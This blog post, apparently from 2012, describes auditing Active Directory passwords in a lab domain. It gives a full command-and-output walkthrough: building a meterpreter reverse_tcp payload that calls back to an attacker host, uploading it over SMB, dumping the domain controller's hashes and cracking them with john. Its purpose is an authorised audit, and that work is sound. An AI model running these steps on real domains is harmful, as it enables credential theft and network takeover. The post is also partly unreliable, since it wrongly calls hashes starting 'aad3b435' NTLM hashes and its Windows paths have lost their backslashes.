Have you done a password audit on your Active Directory lately? Well I had not done one and wanted to see how easy it would be to crack my users passwords. I mean, we have a strong GPO and everything! Boy was I surprised… Needless to say, we are now implementing passphrases of which I will write about later. What I wanted to write today about is how I went about the password audit on the Active Directory.

Now, perhaps there is another way of doing this, but my search-fu was lacking in the process. I thought I would show you my approach and hopefully you can tell me a better way, or benefit from what I did. For this write up, I created a Windows 2003 Server VM with the domain of HAPPYACHMEDSCARWASH.local. I am using back|track 5 R3 for the other VM.

Note: I did try pwdump4 and pwdump6. pwdump4 didn’t do anything and pwdump6 crashed lsass.exe which caused the DC to reboot! For the love of all things pure, do not run pwdump6 against a live DC during production hours… It’s painful. 🙁

Step 1: Create the pwaudit.exe payload

Fire up your back|track and make sure you do a msfupdate before you create the payload. Once you are updated type the following (replacing the LHOST with the IP of the back|track box):

root@bt:~# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.10 LPORT=8080 EXITFUNC=thread X > pwaudit.exe

You should receive output that looks like this:

Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 290
Options: {"LHOST"=>"192.168.0.10", "LPORT"=>"8080", "EXITFUNC"=>"thread"}
root@bt:~#

Step 2:  Upload payload to the Domain Controller

The next step is to get the payload over to the domain controller. You can use the GUI based Places > Connect to Server interface to connect to the DC and use the GUI to transfer the file. I am going to just put the smbclient CLI commands here for those that enjoy the command line. (Note: You have to escape the backlashes “\[ipaddress][share]”)

root@bt:~# smbclient \192.168.0.1c$ --user=Administrator
Enter Administrator's password: 
Domain=[HAPPYACHMEDSCAR] OS=[Windows Server 2003 3790 Service Pack 2] Server=[Windows Server 2003 5.2]
smb: > put pwaudit.exe
putting file pwaudit.exe as pwaudit.exe (14414.2 kb/s) (average 14414.5 kb/s)
smb: >

Leave the terminal window open for now as you will need to come back to this at Step 7. Open a new terminal window for step 3.

Step 3: Set up Handler with Meterpreter Reverse TCP Payload

Now that we have our payload on our domain controller, we need to set up our metasploit handler with the windows/meterpreter/reverse_tcp payload. This is what our payload on our DC will talk with.

root@bt:~# msfconsole
msf > use multi/handler
msf  exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf  exploit(handler) > set LHOST 192.168.0.10
LHOST => 192.168.0.10
msf  exploit(handler) > set LPORT 8080
LPORT => 8080
msf  exploit(handler) > exploit -z

[*] Started reverse handler on 192.168.0.10:8080 
[*] Starting the payload handler...

Step 4: Launch pwaudit.exe on the Domain Controller

I don’t know how to do this remotely from the back|track CLI, so if you know I will gladly update this post with your solution. On the DC, run “C:pwaudit.exe”. It should simply show that it ran and no other output is shown on the DC. However, on the back|track msfconsole session, you should see a similar output as below:

[*] Sending stage (752128 bytes) to 192.168.0.1
[*] Meterpreter session 1 opened (192.168.0.10:8080 -> 192.168.0.1:1775) at 2012-11-06 07:37:03 -0600
[*] Session 1 created in the background.
msf  exploit(handler) >

Step 5: Set up Logging

If your DC was anything like mine, it had way more entries than my scrollback cache on my terminal. So instead of trying to copy & paste the output, I used the spool command to log all of my commands and output to a file. Type the following:

msf  exploit(handler) > spool /root/achmed_dc.txt
[*] Spooling to file /root/achmed_dc.txt...
msf  exploit(handler) >  >

Step 6: Get the Hashes

We are in and ready to get the domain controller hashdump. Everything we type from this point will be saved in our achmed_dc.txt file.

msf  exploit(handler) >  > sessions -i 1
[*] Starting interaction with 1...

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:722caad1241f6ddff0fa35c3b77f0480:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:9e633d785f08c815c802c42825875682:::
SUPPORT_388945a0:1001:aad3b435b51404eeaad3b435b51404ee:f9055527db5235f328d0c20da16c0757:::
easycrack:1110:e52cac67419a9a2238f10713b629b565:64f12cddaa88057e06a81b54e73b949b:::
littletougher:1111:b5d3b243a56ff3560beeb5bc2a6b6392:198aa5577c1f9ae5efd691b0f9d4690d:::
strongpw:1112:6e8d6ebda91958618f4b09ad1d24afc1:386976b064422cbb49a75b86b392e8f2:::
W2K3SRV-VM$:1005:aad3b435b51404eeaad3b435b51404ee:fb3a5b92881f988fed53c962429b2a1e:::

Step 7: Clean Up

Now that we have the hashes, let’s go ahead and clean up the pwaudit.exe process and remove the file.

meterpreter > shell
Process 3908 created.
Channel 1 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:>taskkill /f /im pwaudit.exe
taskkill /f /im pwaudit.exe

[*] 192.168.0.1 - Meterpreter session 1 closed.  Reason: Died

msf  exploit(handler) >  > 
msf  exploit(handler) >  > spool off
[*] Spooling is now disabled
msf  exploit(handler) >  >  > exit
root@bt:~#

Go back to the smbclient terminal window that you left open from Step 2. Type the following:

smb: > del pwaudit.exe
smb: > quit
root@bt:~#

You can close the terminal window now as you are done with that one.

Step 8: Crack the Hashes

The default way that windows stores hashes is with LAN Manager (LM). This means that if the password is 14 characters or less, regardless of complexity, it stores them in two separate 7 character passwords (so to speak). Which means that when you crack a 14 character LM hash, it’s really only cracking two separate 7 character passwords. Which doesn’t take all that long. If the passwords are longer than 14 characters, it takes a lot longer to crack. So what I did was separate out the 14 character or less passwords from the hash dump. “How?” you say? You can identify the LM hash versus the NTLM hashes. The NTLM hashes start with “aad3b435”. So I excluded them from my crack for now to crack later. (Note: You can use GPO settings to force all passwords to be stored in NTLM regardless of length.)

Type the following:

root@bt:~# cat achmed_dc.txt | grep ":::" | grep -v ":aad3b4" > achmedhash.txt

This will pull the hash lines “:::” from our output file from metasploit, then look for any “aad3b4” lines and omit them (-v), and output the rest to achmedhash.txt. This is the file we will send to john. Type the following:

root@bt:~# /pentest/passwords/john/john --format=lm achmedhash.txt

On my virtual box with 1024MB of RAM it took 35 minutes to break all 3 passwords. You should see output similar to the following:

Loaded 6 password hashes with no different salts (LM DES [128/128 BS SSE2])
Remaining 4 password hashes with no different salts
COMMAND          (littletougher:1)
O21              (littletougher:2)
R0R!             (strongpw:2)
B2R-M1R          (strongpw:1)
guesses: 4  time: 0:00:35:33 DONE (Tue Nov  6 08:22:13 2012)  c/s: 39073K  trying: B2R-M31 - B2R-M1R
Warning: passwords printed above might be partial
Use the "--show" option to display all of the cracked passwords reliably
root@bt:~#

You will notice that the easycrack password is not listed. That is because john has that hash already and doesn’t need to brute force it. To see all of the passwords with their hashes type the following:

root@bt:~# /pentest/passwords/john/john --show achmedhash.txt 
easycrack:PASSWORD1:e52cac67419a9a2238f10713b629b565:64f12cddaa88057e06a81b54e73b949b:::
littletougher:COMMANDO21:b5d3b243a56ff3560beeb5bc2a6b6392:198aa5577c1f9ae5efd691b0f9d4690d:::
strongpw:B2R-M1RR0R!:6e8d6ebda91958618f4b09ad1d24afc1:386976b064422cbb49a75b86b392e8f2:::

6 password hashes cracked, 0 left
root@bt:~#

Conclusion

There you have it. Now you can use this report to go back and stress the importance of strong passwords to your c-levels. A few words of caution.

  1. You are using meterpreter on an active DC. Don’t mess around with the commands if you don’t know what you are doing. You don’t want to explain to your CSO/CIO/CEO to why you hosed your DC.
  2. Also, you should have the CEO/CIO/CSOs permission before you do this. They may not be too happy if you do a password audit on them.
  3. Protect the output file after it’s finished being cracked. You really don’t want a file with all of your users passwords in plaintext on your box.
  4. Perhaps consider implementing passphrases or a GPO of 15 chars minimum on your passwords.
  5. Be sure the GPO is set to force NTLM storage regardless of password length. This doesn’t mean they are uncrackable, it just takes longer than LM hashes.

Feel free to offer any suggestions for alternatives to this process. It worked great for me.

Share →